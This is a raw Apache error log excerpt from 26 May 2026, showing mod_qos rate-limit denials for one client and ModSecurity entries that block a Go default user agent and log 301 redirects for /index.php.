[Tue May 26 20:00:05.940445 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7nwAAABw
[Tue May 26 20:00:05.940449 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7ngAAAEs
[Tue May 26 20:00:05.943171 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7oAAAAFs
[Tue May 26 20:00:05.943196 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7oQAAACg
[Tue May 26 20:00:05.943288 2026] [qos:error] [pid 106517:tid 106677] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWubYZZc2DoU1lPnP1YPAAAAKA
[Tue May 26 20:00:05.944200 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7ogAAAGw
[Tue May 26 20:00:05.945922 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubWDRMqfxdEDkosz7owAAAEQ
[Tue May 26 20:00:05.951382 2026] [qos:error] [pid 106517:tid 106687] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubYZZc2DoU1lPnP1YPwAAAKk
[Tue May 26 20:00:06.082137 2026] [security2:error] [pid 106517:tid 106701] [client 103.163.220.23:50349] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/js/"] [unique_id "ahWuboZZc2DoU1lPnP1YSwAAALc"]
[Tue May 26 20:00:06.082756 2026] [qos:error] [pid 106517:tid 106742] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuboZZc2DoU1lPnP1YSgAAAOA
[Tue May 26 20:00:06.082891 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubmDRMqfxdEDkosz7pgAAAEk
[Tue May 26 20:00:06.087762 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubmDRMqfxdEDkosz7pwAAAG0
[Tue May 26 20:00:06.088636 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubmDRMqfxdEDkosz7qAAAAHE
[Tue May 26 20:00:06.090552 2026] [qos:error] [pid 106517:tid 106774] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuboZZc2DoU1lPnP1YTAAAAQA
[Tue May 26 20:00:06.093534 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubmDRMqfxdEDkosz7qQAAABU
[Tue May 26 20:00:06.094698 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubmDRMqfxdEDkosz7qgAAAA0
[Tue May 26 20:00:06.095477 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubmDRMqfxdEDkosz7qwAAAFA
[Tue May 26 20:00:06.096217 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubmDRMqfxdEDkosz7rAAAADw
[Tue May 26 20:00:06.106188 2026] [qos:error] [pid 106517:tid 106757] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuboZZc2DoU1lPnP1YTQAAAO8
[Tue May 26 20:00:06.274392 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz69wAAAA4"]
[Tue May 26 20:00:06.276339 2026] [security2:error] [pid 106517:tid 106714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1XxwAAAMQ"]
[Tue May 26 20:00:06.276982 2026] [security2:error] [pid 106517:tid 106738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1XvwAAANw"]
[Tue May 26 20:00:06.278261 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz66wAAAFk"]
[Tue May 26 20:00:06.279932 2026] [security2:error] [pid 106517:tid 106667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1XwQAAAJY"]
[Tue May 26 20:00:06.285260 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1XwgAAAPA"]
[Tue May 26 20:00:06.295513 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1XzgAAALM"]
[Tue May 26 20:00:06.296597 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1XxQAAANY"]
[Tue May 26 20:00:06.311680 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1X0gAAAL0"]
[Tue May 26 20:00:06.316719 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz7CAAAACs"]
[Tue May 26 20:00:06.326854 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz7BAAAADg"]
[Tue May 26 20:00:06.328014 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz6-gAAAH8"]
[Tue May 26 20:00:06.328484 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1XzAAAAMo"]
[Tue May 26 20:00:06.329252 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz6_gAAAEI"]
[Tue May 26 20:00:06.350450 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz6-wAAAFQ"]
[Tue May 26 20:00:06.367230 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubIZZc2DoU1lPnP1X1QAAAJk"]
[Tue May 26 20:00:06.374849 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7UwAAAEE"]
[Tue May 26 20:00:06.377678 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz7DgAAAGE"]
[Tue May 26 20:00:06.392617 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YDQAAALU"]
[Tue May 26 20:00:06.394823 2026] [security2:error] [pid 106517:tid 106658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1X9QAAAI0"]
[Tue May 26 20:00:06.396140 2026] [security2:error] [pid 106517:tid 106653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YAAAAAIg"]
[Tue May 26 20:00:06.401673 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7cQAAAAI"]
[Tue May 26 20:00:06.404189 2026] [security2:error] [pid 106517:tid 106777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YCQAAAQM"]
[Tue May 26 20:00:06.414160 2026] [security2:error] [pid 106517:tid 106693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YCAAAAK8"]
[Tue May 26 20:00:06.416865 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubGDRMqfxdEDkosz7EAAAABI"]
[Tue May 26 20:00:06.423691 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7ZwAAAD8"]
[Tue May 26 20:00:06.426676 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YCgAAAJ0"]
[Tue May 26 20:00:06.431019 2026] [security2:error] [pid 106517:tid 106706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YDAAAALw"]
[Tue May 26 20:00:06.441596 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7dgAAAFM"]
[Tue May 26 20:00:06.442777 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7VAAAAG4"]
[Tue May 26 20:00:06.452430 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7VgAAAAQ"]
[Tue May 26 20:00:06.452749 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7egAAAAE"]
[Tue May 26 20:00:06.580036 2026] [security2:error] [pid 106517:tid 106688] [client 103.163.220.28:22409] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/images/"] [unique_id "ahWuboZZc2DoU1lPnP1YdwAAAKo"]
[Tue May 26 20:00:06.617131 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWubmDRMqfxdEDkosz78wAAAE8
[Tue May 26 20:00:06.617609 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWubmDRMqfxdEDkosz79QAAACI
[Tue May 26 20:00:06.619237 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubmDRMqfxdEDkosz7-AAAAHc
[Tue May 26 20:00:06.620070 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWubmDRMqfxdEDkosz7-QAAAEw
[Tue May 26 20:00:06.620887 2026] [qos:error] [pid 106517:tid 106766] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuboZZc2DoU1lPnP1YhwAAAPg
[Tue May 26 20:00:06.622421 2026] [qos:error] [pid 106517:tid 106741] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuboZZc2DoU1lPnP1YiAAAAN8
[Tue May 26 20:00:06.623973 2026] [qos:error] [pid 106517:tid 106776] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuboZZc2DoU1lPnP1YiwAAAQI
[Tue May 26 20:00:06.624377 2026] [qos:error] [pid 93576:tid 93723] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWubmDRMqfxdEDkosz7_AAAAAs
[Tue May 26 20:00:06.629215 2026] [qos:error] [pid 106517:tid 106683] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuboZZc2DoU1lPnP1YjgAAAKU
[Tue May 26 20:00:06.633385 2026] [qos:error] [pid 106517:tid 106682] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuboZZc2DoU1lPnP1YkQAAAKQ
[Tue May 26 20:00:06.633610 2026] [qos:error] [pid 106517:tid 106777] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuboZZc2DoU1lPnP1YkgAAAQM
[Tue May 26 20:00:07.088476 2026] [security2:error] [pid 93576:tid 93730] [client 103.163.220.9:54365] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wordpress/wp-admin/maint/"] [unique_id "ahWub2DRMqfxdEDkosz8CAAAABI"]
[Tue May 26 20:00:07.276819 2026] [security2:error] [pid 106517:tid 106700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1X_wAAALY"]
[Tue May 26 20:00:07.280927 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YEAAAAPk"]
[Tue May 26 20:00:07.299979 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWub2DRMqfxdEDkosz8FAAAAAE
[Tue May 26 20:00:07.300823 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7dQAAAHw"]
[Tue May 26 20:00:07.300841 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7eAAAAAc"]
[Tue May 26 20:00:07.303685 2026] [qos:error] [pid 106517:tid 106715] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWub4ZZc2DoU1lPnP1YqgAAAMU
[Tue May 26 20:00:07.306497 2026] [security2:error] [pid 106517:tid 106764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YJAAAAPY"]
[Tue May 26 20:00:07.310830 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7cgAAACc"]
[Tue May 26 20:00:07.320610 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YIwAAANE"]
[Tue May 26 20:00:07.323834 2026] [security2:error] [pid 106517:tid 106708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YGwAAAL4"]
[Tue May 26 20:00:07.327261 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YGAAAAOM"]
[Tue May 26 20:00:07.339713 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7fQAAAH0"]
[Tue May 26 20:00:07.348925 2026] [security2:error] [pid 106517:tid 106684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YFwAAAKY"]
[Tue May 26 20:00:07.350222 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7ewAAADc"]
[Tue May 26 20:00:07.355897 2026] [security2:error] [pid 106517:tid 106681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YLAAAAKM"]
[Tue May 26 20:00:07.360399 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubmDRMqfxdEDkosz7vgAAABU"]
[Tue May 26 20:00:07.370690 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubWDRMqfxdEDkosz7fgAAAC8"]
[Tue May 26 20:00:07.372233 2026] [security2:error] [pid 106517:tid 106762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWubYZZc2DoU1lPnP1YIgAAAPQ"]
[Tue May 26 20:00:07.379989 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuboZZc2DoU1lPnP1YWQAAAKk"]
